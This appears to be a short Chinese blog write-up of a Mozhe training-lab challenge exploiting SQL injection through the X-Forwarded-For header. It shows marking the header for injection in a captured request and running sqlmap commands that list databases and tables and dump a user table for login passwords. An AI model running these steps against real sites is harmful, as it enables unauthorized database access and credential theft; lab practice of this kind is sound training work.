题目是X-Forwarded-For注入漏洞实战,我们先来brup抓包
墨者X-Forwarded-For注入漏洞实战
brup抓包发现没有X-Forwarded-For头。就试试添加X-Forwarded-For:0.0.0.0试试,发现有回显
墨者X-Forwarded-For注入漏洞实战
那我们就把把X-Forwarded-For的值设置为*``即X-Forwarded-For:*,然后保存为1.txt
墨者X-Forwarded-For注入漏洞实战
1.sqlmap -r 1.txt --dbs --batch爆库,注出information_schema库和webcalendar库
2.sqlmap -r 1.txt -D webcalendar --tables --batch爆表名,注出user和login表
3.sqlmap -r 1.txt --batch --dump-all -T"user" -D"webcalendar" ,dump出user里全部内容得到登录密码
墨者X-Forwarded-For注入漏洞实战

相关文章:

  • 2022-12-23
  • 2021-05-24
  • 2022-12-23
  • 2021-04-10
  • 2021-12-13
  • 2022-01-04
  • 2021-04-24
猜你喜欢
  • 2021-09-03
  • 2021-08-17
  • 2022-01-20
  • 2021-10-19
  • 2021-07-18
  • 2022-12-23
相关资源
相似解决方案